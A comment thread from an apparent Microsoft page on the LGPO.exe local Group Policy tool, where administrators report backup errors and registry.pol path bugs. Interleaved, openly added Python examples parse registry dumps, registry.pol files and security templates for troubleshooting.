10. Browse to where the administrative template should be. Go to: local computer policy>computer configuration>administrative templates, and expand administrative templates, by click on the arrow next to the folder name. The MSS (Legacy) folder should be there, and you can expand it to view the group policy settings
11. Confirm the administrative template is there
12. Done
Note: The Group Policy Object Editor will automatically read all ADMX files stored in the %systemroot%\PolicyDefinitions\ directory. This procedure assumes this machine is not joined to a domain with an ADMX central store.
I know I’m late, but regarding MLGPO, I found this folder to be very interesting: %WinDir%\System32\GroupPolicyUsers
Here we have sid folders for user(s) who have their own gpo.
To get sid: wmic useraccount get name,sid
Aaron,
Thank you for creating this tool. I am using it to create hardened baseline security configurations on standalone systems and I am exporting those security baselines to other standalone workstations. I have run into an issue though, when I export the LGPO policy, the GptTmpl “inf” file [file security] SACL are missing. I have to turn on auditing on several files and folders and I can’t seem to export the INF file template with the [File Security] settings.
Am I missing something, or does this exe write to stderr instead of stdout?
Entering the following in a cmd window:
LGPO.exe 1>out.txt 2>err.txt
writes all the output to err.txt instead of out.txt.
This is the same for other calls to LGPO.exe, e.g. using /g
Hi, can this tool help me import/export group policy that I took from Active Directory to local group policy in Windows 7/10?
I am having trouble using LGPO v1.00 to backup the policies on a Windows 10 machine. I get error 0x0000000D occurred:
c:\program files\lgpo\lgpo.exe /b c:\GpoBackups
LGPO.exe v1.00 – Local Group Policy Object utility
Creating LGPO backup in “c:\gpobackups\{…..}”
Executing command:
c:\windows\system32\auditpol.exe /backup
/file:”c:gpobackups\{…..]\domainSysvol\GPO\Machine\microsoft\windows nt\audit\audit.csv”
Error 0x0000000D occurred:
The data is invalid.
External process exited with exit code 13
_________________________________________________________________________________________________
Any thoughts on how to get this to work?
It is on an English system and I have tried with Version 2 and get the same error. This is on a Windows 7 system that was upgraded to Windows 10 in place.
reg.exe query hklm\system\currentcontrolset\control\lsa
Here you go sir.
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
auditbasedirectories reg_dword 0x0
auditbaseobjects reg_dword 0x0
bounds reg_binary 0030000000200000
limitblankpassworduse reg_dword 0x1
nolmhash reg_dword 0x1
notification packages reg_multi_sz scecli
authentication packages reg_multi_sz msv1_0
crashonauditfail reg_dword 0x0
disabledomaincreds reg_dword 0x0
everyoneincludesanonymous reg_dword 0x0
forceguest reg_dword 0x0
fullprivilegeauditing reg_binary 3000
lmcompatibilitylevel reg_dword 0x1
lsapid reg_dword 0x29c
producttype reg_dword 0x4
restrictanonymous reg_dword 0x1
restrictanonymoussam reg_dword 0x1
scenoapplylegacyauditpolicy reg_dword 0x1
secureboot reg_dword 0x1
security packages reg_multi_sz kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\accessproviders
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\audit
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\centralizedaccesspolicies
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\credssp
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\data
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\fipsalgorithmpolicy
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\gbg
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\jd
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\kerberos
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\msv1_0
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\osconfig
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\skew1
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sso
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sspicache
It appears to be fullprivilegeauditing. If I set that to 00 instead of 3000, LGPO completes the backup without error.
It seems to be that way on all of our workstations. What is it for? Is it something that has been improperly set in a group policy?
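A check for the condition found above, added here as an example (it is not from the page's author or from LGPO.exe): it parses `reg.exe query` output and flags FullPrivilegeAuditing when it is not a single byte 00 or 01, which is the form security policy writes for "Audit: Audit the use of Backup and Restore privilege". SAMPLE_DUMP is constructed from the values posted above, laid out as reg.exe actually prints them (runs of spaces between columns).

```python
import re
import sys
from typing import Dict, List, Tuple

# LSA values that security policy stores as REG_BINARY and that must be exactly one
# byte, 00 or 01. The 2-byte value 3000 seen above (ASCII '0' plus a NUL) is what the
# poster found to break auditpol.exe /backup ("The data is invalid").
ONE_BYTE_BINARY = {
    "fullprivilegeauditing": "Audit: Audit the use of Backup and Restore privilege",
}

# reg.exe prints "    <name>    <REG_TYPE>    <data>" with runs of spaces between fields.
_VALUE_LINE = re.compile(r"^\s*(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*?)\s*$",
                         re.IGNORECASE)


def parse_reg_query(output: str) -> Dict[str, Tuple[str, str]]:
    """Turn `reg query` output into {value name (lower-case): (REG_TYPE, data)}."""
    values: Dict[str, Tuple[str, str]] = {}
    for line in output.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            values[m["name"].lower()] = (m["type"].upper(), m["data"])
    return values


def check_lsa_values(output: str) -> List[str]:
    """Report LSA values whose type or length auditpol.exe /backup will reject."""
    findings = []
    values = parse_reg_query(output)
    for name, setting in ONE_BYTE_BINARY.items():
        if name not in values:
            continue
        rtype, data = values[name]
        if rtype != "REG_BINARY" or data.lower() not in ("00", "01"):
            findings.append(f"{name}: found {rtype} {data}, expected REG_BINARY 00 or 01 "
                            f"({setting}); auditpol.exe /backup returned 0x0000000D on this")
    return findings


# Constructed from the dump posted above, in reg.exe's own column layout.
SAMPLE_DUMP = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa
    auditbasedirectories    REG_DWORD    0x0
    crashonauditfail    REG_DWORD    0x0
    fullprivilegeauditing    REG_BINARY    3000
    lmcompatibilitylevel    REG_DWORD    0x1
    notification packages    REG_MULTI_SZ    scecli
    scenoapplylegacyauditpolicy    REG_DWORD    0x1
"""

if __name__ == "__main__":
    # Windows: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa | python check_lsa.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DUMP
    for finding in check_lsa_values(text) or ["no findings"]:
        print(finding)
```

The table of expected values is deliberately a dict so other LSA values with a known shape can be added to the same pass before running LGPO /b across a fleet.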
Aaron,
Just a suggestion, but with the pre-release of 2.0 maybe put a link to that in the header summary for easy finding? Especially if you want to start deprecating the 1.0 version.
Cheers,
Mark
Hi, great work. When I import GPO policies to a new computer (with LGPO.exe /g path), the GPOs apply correctly (and appear in gpedit.msc), but in regedit I cannot find the key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
Where is the new GPO security template imported into regedit? thanks
Hi Aaron,
Would the lgpo tool be able to process local GPO preferences with the /e option? I’ve created a gpo with a preference that sets a reg key, but I can’t get it to work. Could be me. Hope you can help me out in understanding.
It would be great if there was a backup option that went straight to an LGPO text file. My use case is just backing up registry-based LGPO stuff, and I want a nice diffable format. Right now I have to backup to a folder and then parse the .pol files and merge to get a single LGPO text. The LGPO text can be imported, so it would be great to be able to output it as well.
I may have encountered an obscure bug.
I had instances where `lgpo.exe /t path\lgpo.txt` appeared to not import machine-level settings on a few hosts, and eventually found it was updating \windows\syswow64\grouppolicy\machine\registry.pol rather than \windows\system32\grouppolicy\machine\registry.pol.
I don’t know how the syswow64 version of registry.pol was created (on only a few machines in my environment), but I’ve found it to be reproducible that if I copy system32\GroupPolicy to syswow64\GroupPolicy, that subsequent runs of lgpo.exe will begin updating the syswow64 version rather than the system32 version of registry.pol.
I will attempt to workaround by finding and removing syswow64\GroupPolicy\Machine and syswow64\GroupPolicy\User. Are there any cases where a syswow64 copy of the GroupPolicy folder should be kept rather than removed?
Thanks again Aaron for the great tool, it continues to be useful for me daily!
Another quick test – if the Windows\SysWOW64\GroupPolicy\Machine folder is present, lgpo.exe /t file.inf will create a new registry.pol file in the syswow64 path. So I don’t need an existing registry.pol file, just the existence of a SysWOW64\GroupPolicy\Machine folder is enough to trigger this issue for me.
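An added example, not LGPO.exe's own code, that covers the two requests above: a parser for the registry.pol format that emits the four-line LGPO text form shown elsewhere on this page, and a diff of two registry.pol files so the System32 and SysWOW64 copies of GroupPolicy\Machine\registry.pol can be compared. The PReg header, the [key;value;type;size;data] records and the **del. / **delvals. deletion markers follow the MS-GPREG specification; the DELETE/DELETEALLVALUES, MULTISZ and BINARY spellings are this example's rendering, since the page itself shows only the DWORD form of LGPO text. SAMPLE_A, SAMPLE_B and the value name ExampleValue are constructed fixtures.

```python
import struct
import sys
from typing import List, Set, Tuple

Entry = Tuple[str, str, int, bytes]  # key path, value name, REG_* type, raw data

# REG_* type codes found in registry.pol and the LGPO text keyword used for each.
TYPE_KEYWORD = {1: "SZ", 2: "EXSZ", 3: "BINARY", 4: "DWORD", 7: "MULTISZ", 11: "QWORD"}


def _w(text: str) -> bytes:
    """registry.pol stores strings and the [ ; ] delimiters as UTF-16LE."""
    return text.encode("utf-16-le")


def _read_wstr(data: bytes, pos: int) -> Tuple[str, int]:
    """Read a NUL-terminated UTF-16LE string; return (text, offset after the NUL)."""
    end = pos
    while data[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(data):
            raise ValueError("unterminated string in registry.pol")
    return data[pos:end].decode("utf-16-le"), end + 2


def _expect(data: bytes, pos: int, delim: str) -> int:
    if data[pos:pos + 2] != _w(delim):
        raise ValueError(f"expected {delim!r} at offset {pos}")
    return pos + 2


def parse_registry_pol(data: bytes) -> List[Entry]:
    """Parse the [key;value;type;size;data] records that follow the PReg header."""
    if data[:4] != b"PReg" or struct.unpack_from("<I", data, 4)[0] != 1:
        raise ValueError("not a registry.pol file (PReg version-1 header missing)")
    pos, entries = 8, []
    while pos < len(data):
        pos = _expect(data, pos, "[")
        key, pos = _read_wstr(data, pos)
        pos = _expect(data, pos, ";")
        value, pos = _read_wstr(data, pos)
        pos = _expect(data, pos, ";")
        rtype = struct.unpack_from("<I", data, pos)[0]  # type and size are raw DWORDs
        pos = _expect(data, pos + 4, ";")
        size = struct.unpack_from("<I", data, pos)[0]
        pos = _expect(data, pos + 4, ";")
        payload = data[pos:pos + size]
        pos = _expect(data, pos + size, "]")
        entries.append((key, value, rtype, payload))
    return entries


def _render_data(rtype: int, payload: bytes) -> str:
    if rtype == 4:
        return f"DWORD:{struct.unpack('<I', payload)[0]}"
    if rtype == 11:
        return f"QWORD:{struct.unpack('<Q', payload)[0]}"
    if rtype in (1, 2):
        return f"{TYPE_KEYWORD[rtype]}:{payload.decode('utf-16-le').rstrip(chr(0))}"
    if rtype == 7:
        # NUL-separated items, written joined by a literal \0 (reg.exe notation); this
        # spelling is an assumption, the page shows only the DWORD form of LGPO text.
        items = payload.decode("utf-16-le").rstrip(chr(0)).split(chr(0))
        return "MULTISZ:" + "\\0".join(items)
    return f"BINARY:{payload.hex()}"


def entry_to_lgpo_text(scope: str, entry: Entry) -> str:
    """Render one record as the four-line LGPO text block: scope, key, value, action."""
    key, value, rtype, payload = entry
    low = value.lower()
    # **del.<name> and **delvals. are the deletion markers defined in MS-GPREG.
    if low.startswith("**del."):
        action, value = "DELETE", value[len("**del."):]
    elif low == "**delvals.":
        action, value = "DELETEALLVALUES", "*"
    else:
        action = _render_data(rtype, payload)
    return "\n".join([scope, key, value, action])


def pol_to_lgpo_text(data: bytes, scope: str = "Computer") -> str:
    """Whole file as LGPO text, one blank line between entries (diff-friendly)."""
    return "\n\n".join(entry_to_lgpo_text(scope, e) for e in parse_registry_pol(data)) + "\n"


def diff_pol(first: bytes, second: bytes, scope: str = "Computer") -> Tuple[Set[str], Set[str]]:
    """(only in first, only in second), e.g. System32 vs SysWOW64 copies of registry.pol."""
    a = {entry_to_lgpo_text(scope, e) for e in parse_registry_pol(first)}
    b = {entry_to_lgpo_text(scope, e) for e in parse_registry_pol(second)}
    return a - b, b - a


# Constructed fixtures (not real files): SAMPLE_A holds AllowCortana=0; SAMPLE_B adds a
# deletion of a made-up value name so diff_pol has something to report.
_HEADER = b"PReg" + struct.pack("<I", 1)
_KEY = "SOFTWARE\\Policies\\Microsoft\\Windows\\Windows Search"
_CORTANA = (_w("[") + _w(_KEY + "\0;AllowCortana\0;") + struct.pack("<I", 4) + _w(";")
            + struct.pack("<I", 4) + _w(";") + struct.pack("<I", 0) + _w("]"))
_DELETE = (_w("[") + _w(_KEY + "\0;**del.ExampleValue\0;") + struct.pack("<I", 1) + _w(";")
           + struct.pack("<I", 4) + _w(";") + _w(" \0") + _w("]"))
SAMPLE_A = _HEADER + _CORTANA
SAMPLE_B = _HEADER + _CORTANA + _DELETE

if __name__ == "__main__":
    # Usage: python pol2lgpo.py registry.pol [second.pol] -> LGPO text, or a diff of two files
    files = [open(p, "rb").read() for p in sys.argv[1:]] or [SAMPLE_A]
    if len(files) == 2:
        only_a, only_b = diff_pol(*files)
        print("only in first:", *sorted(only_a), sep="\n")
        print("only in second:", *sorted(only_b), sep="\n")
    else:
        print(pol_to_lgpo_text(files[0]), end="")
```

Pass the user-side registry.pol with scope "User" when rendering it, since the scope line is what tells LGPO.exe which hive the text belongs to.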
Hi!
Thanks for the great work!
But…
How do I export MLGPOs on a Win10 Enterprise machine and how do I import them, or create a GPOPack (which are the compatible files that need to be included in the export directory… GPOPack.wsf/LocalPol.exe/LocalSecurityDB.sdb?)?
I would highly appreciate an answer to solve this week-lasting problem. 🙂
Oh, and you need LGPO v2 for this. https://blogs.technet.microsoft.com/secguide/2016/09/23/lgpo-exe-v2-0-pre-release-support-for-mlgpo-and-reg_qword/
Hi, I’m trying to disable Windows 10’s Cortana using the text policy file below.
Computer
SOFTWARE\Policies\Microsoft\Windows\Windows Search
AllowCortana
DWORD:0
The command that I’m using is lgpo.exe /t cortana.txt /v
The Result is this:
Apply registry-based settings from LGPO text file: cortana.txt
PROCESSING INPUT FILE FOR REGISTRY-BASED POLICY: cortana.txt
Computer Config SOFTWARE\Policies\Microsoft\Windows\Windows Search AllowCortana REG_DWORD 0
The problem is that the policy never seems to actually get applied if I check the registry or using gpedit.
Am I missing something?
Thanks
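The reverse direction, as an added example that is not LGPO.exe's own code: build registry.pol bytes from the LGPO text posted above, one file per scope ("Computer" entries belong in GroupPolicy\Machine, "User" entries in GroupPolicy\User). The record layout and the **del. / **delvals. deletion markers follow MS-GPREG; the set of action keywords accepted is an assumption, since the page shows only DWORD. This is for inspecting what a given text turns into and comparing it with what is on disk; applying it remains LGPO.exe /t's job.

```python
import struct
import sys
from pathlib import Path
from typing import Dict, Optional, Tuple

REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD, REG_MULTI_SZ, REG_QWORD = 1, 2, 3, 4, 7, 11


def _w(text: str) -> bytes:
    """registry.pol stores strings and the [ ; ] delimiters as UTF-16LE."""
    return text.encode("utf-16-le")


def _int(arg: str) -> int:
    return int(arg, 16) if arg.lower().startswith("0x") else int(arg)


def _encode_action(action: str) -> Tuple[int, bytes, Optional[str]]:
    """Map an LGPO text action to (REG_* type, data bytes, value-name marker).
    Deletions become REG_SZ " " under the **del. / **delvals. markers (MS-GPREG)."""
    kind, _, arg = action.partition(":")
    kind = kind.strip().upper()
    if kind == "DWORD":
        return REG_DWORD, struct.pack("<I", _int(arg)), None
    if kind == "QWORD":
        return REG_QWORD, struct.pack("<Q", _int(arg)), None
    if kind == "SZ":
        return REG_SZ, _w(arg + "\0"), None
    if kind == "EXSZ":
        return REG_EXPAND_SZ, _w(arg + "\0"), None
    if kind == "MULTISZ":
        # Items separated by a literal \0 in the text (assumption; the page shows DWORD only).
        return REG_MULTI_SZ, _w("\0".join(arg.split("\\0")) + "\0\0"), None
    if kind == "BINARY":
        return REG_BINARY, bytes.fromhex(arg), None
    if kind == "DELETE":
        return REG_SZ, _w(" \0"), "**del."
    if kind == "DELETEALLVALUES":
        return REG_SZ, _w(" \0"), "**delvals."
    raise ValueError(f"unsupported LGPO text action: {action!r}")


def _record(key: str, value: str, rtype: int, data: bytes) -> bytes:
    """One [key;value;type;size;data] record; type and size are little-endian DWORDs."""
    return (_w("[") + _w(key + "\0") + _w(";") + _w(value + "\0") + _w(";")
            + struct.pack("<I", rtype) + _w(";") + struct.pack("<I", len(data)) + _w(";")
            + data + _w("]"))


def build_registry_pol(lgpo_text: str) -> Dict[str, bytes]:
    """Build one registry.pol per scope from four-line LGPO text entries
    (scope, key, value, action). Blank lines and ';' comment lines are skipped."""
    lines = [ln.strip() for ln in lgpo_text.splitlines()
             if ln.strip() and not ln.lstrip().startswith(";")]
    if len(lines) % 4:
        raise ValueError("LGPO text must be made of 4-line entries")
    bodies: Dict[str, bytes] = {"Computer": b"", "User": b""}
    for i in range(0, len(lines), 4):
        scope, key, value, action = lines[i:i + 4]
        if scope not in bodies:
            raise ValueError(f"scope must be Computer or User, got {scope!r}")
        rtype, data, marker = _encode_action(action)
        if marker == "**delvals.":
            value = marker                 # whole-key marker replaces the '*' placeholder
        elif marker:
            value = marker + value
        bodies[scope] += _record(key, value, rtype, data)
    header = b"PReg" + struct.pack("<I", 1)
    return {scope: header + body for scope, body in bodies.items() if body}


# The Cortana entry from the post above, exactly as LGPO text is written.
CORTANA_TEXT = r"""Computer
SOFTWARE\Policies\Microsoft\Windows\Windows Search
AllowCortana
DWORD:0
"""

if __name__ == "__main__":
    # Usage: python lgpo_build.py cortana.txt -> writes Machine\registry.pol and/or User\registry.pol
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else CORTANA_TEXT
    for scope, blob in build_registry_pol(text).items():
        out = Path("Machine" if scope == "Computer" else "User") / "registry.pol"
        out.parent.mkdir(exist_ok=True)
        out.write_bytes(blob)
        print(f"{out}: {len(blob)} bytes")
```

For the Cortana text this produces a 160-byte file: the 8-byte header plus one record whose data is the four-byte DWORD 0. The verbose output quoted above shows LGPO.exe parsed the same text to the same key, value and type, so when a setting still does not show up the place to look is what actually landed in System32\GroupPolicy\Machine\registry.pol and whether another policy source overrides it.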
Hi Aaron, I’m just getting back into trying to configure policies again. I looked into Domain policies but I don’t think that’s the case. I’m rolling out Win 10 Enterprise x64 1703 and LGPO policies just don’t take effect. We have 2 domains. I tried our new one, our old one, I tried different OUs, and I tried totally taking the client machine out of the domain, nothing works. The weird thing is that I have another Win 10 machine that’s part of our old domain. That one was setup manually and is build 1607. Any idea what could be going on? The group policy operational log reports error event 7016 when I run the command.
I didn’t complete my statement above, the machine that was rolled out “manually” does apply my Cortana policy successfully using LGPO.EXE.
I have installed the Windows-10-RS1 and Server 2016 Baselines which use LGPO for their installation. When I install the Member server, I see the custom templates referenced in the article (eg. MS Security Guide) when I run Gpedit.msc. When I do the same thing on a W10 1607 LTSB system, I see nothing in GPEdit. The strange part is that the settings are actually there. Specifically the “Apply UAC restrictions to local accounts on network logons” is enabled if I check the registry. Also if I change the registry to zero and then reboot, it is set back to 1. Am I missing something or do Custom Templates just not show in the client GP Editor? If not, how do I change the policies or use the other legacy policies that have been added? Thanks
I’m struggling with this.
I have 10-12 settings I want to deploy to a machine. Prior to importing I take a backup which has no configured settings. I then import my settings from a folder and I can see that they are present using GPedit. Now, if I want to remove these settings I feel that I should simply be able to restore or import the previous backup, but I’m seeing that if I perform the restore there is no change. I’ve run “gpupdate /target:computer /force” and I’ve even rebooted but the settings remain. What am I missing?
ALSO NOTE: if you apply settings to local policy and then export local policy, the security template and advanced auditing portions of the exported policy will almost certainly be different from the policy you applied. “Auditpol.exe /backup” reports all advanced auditing settings, not just the ones you applied. Similarly, “secedit.exe /export” reports most local security settings whether they were defaults, applied through a security template, or changed through other means. Secedit.exe also has some other quirks. For example, it won’t report user rights assignments that are empty, and reports only a subset of the sections that might appear in a security template. It won’t report file security settings, registry security settings, service settings, or restricted groups. For these reasons, local policy backups might be of limited value.
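To see the differences the note describes, here is an added example (not part of LGPO.exe or of the post) that parses two security templates and reports what the export added (defaults or settings from other sources), what it dropped (such as a user right assigned to nobody, which the note says secedit will not report), and what changed value. The two INF samples are constructed; real files from secedit or LGPO are UTF-16LE with a BOM, which read_template handles.

```python
import sys
from typing import Dict

Template = Dict[str, Dict[str, str]]   # section name -> {key: value}, lower-cased


def parse_security_template(text: str) -> Template:
    """Parse the INI-style GptTmpl.inf / secedit export. An empty right-hand side
    (a user right assigned to nobody) is kept as '' so it can be compared."""
    sections: Template = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def read_template(path: str) -> Template:
    """secedit and LGPO write these files as UTF-16LE with a BOM; fall back to UTF-8."""
    raw = open(path, "rb").read()
    text = raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("utf-8-sig")
    return parse_security_template(text)


def compare_templates(applied: Template, exported: Template):
    """Return (not_in_export, added_by_export, changed): settings you applied that the
    export omits, settings the export reports that you never applied, and settings
    whose value differs between the two."""
    not_in_export, added, changed = {}, {}, {}
    for sec, keys in applied.items():
        for k, v in keys.items():
            if k not in exported.get(sec, {}):
                not_in_export[(sec, k)] = v
            elif exported[sec][k] != v:
                changed[(sec, k)] = (v, exported[sec][k])
    for sec, keys in exported.items():
        for k, v in keys.items():
            if k not in applied.get(sec, {}):
                added[(sec, k)] = v
    return not_in_export, added, changed


# Constructed samples: the template that was applied, and what an export of the same
# machine might look like (defaults reported, empty user right dropped).
APPLIED_INF = """[Unicode]
Unicode=yes
[System Access]
MinimumPasswordLength = 14
[Privilege Rights]
SeRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight = *S-1-5-32-546
[Version]
signature="$CHICAGO$"
Revision=1
"""
EXPORTED_INF = """[Unicode]
Unicode=yes
[System Access]
MinimumPasswordLength = 14
MinimumPasswordAge = 1
PasswordHistorySize = 24
[Privilege Rights]
SeDenyNetworkLogonRight = *S-1-5-32-546
[Version]
signature="$CHICAGO$"
Revision=1
"""

if __name__ == "__main__":
    # Usage: python compare_inf.py applied\GptTmpl.inf exported\GptTmpl.inf
    if len(sys.argv) == 3:
        a, b = read_template(sys.argv[1]), read_template(sys.argv[2])
    else:
        a, b = parse_security_template(APPLIED_INF), parse_security_template(EXPORTED_INF)
    missing, added, changed = compare_templates(a, b)
    print("applied but not exported:", missing)
    print("exported but not applied:", added)
    print("value differs:", changed)
```

The "applied but not exported" bucket is the one to watch when a backup is meant to be a record of what was deliberately configured: an empty user rights assignment disappears from the export even though it is still in force.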
It looks like I found the thing that I need, but it is too difficult for me.
I need to disable One Drive, so I need to set
“Computer Configuration > Administrative Templates > Windows Components > OneDrive>Prevent the usage of OneDrive for file storage” policy to “Enabled”
How can I do that with LGPO.exe?
Thanks
Where can I download the version 2 of the LGPO tool supporting Windows Server 2016? I can’t find a download link.
I’m getting the error exit code 3221225477 “STATUS_ACCESS_VIOLATION” during the AUDITPOL stage when importing a GPO backup using LGPO /g command – but the command succeeds and LGPO crashes if I execute the same import a second time. How can I troubleshoot?
I’m assuming “path” in “LGPO.exe /b path” is {path}; then “LGPO.exe /b .” doesn’t work, although “.” is a valid path, and so is “..”
Hello Aaron!
I used LocalGPO Tool in 2008R2 Servers to create and work with MSS Settings in Group Policy Settings.
Now I have a question: how do I create these MSS Settings on 2012R2 Servers using your utility?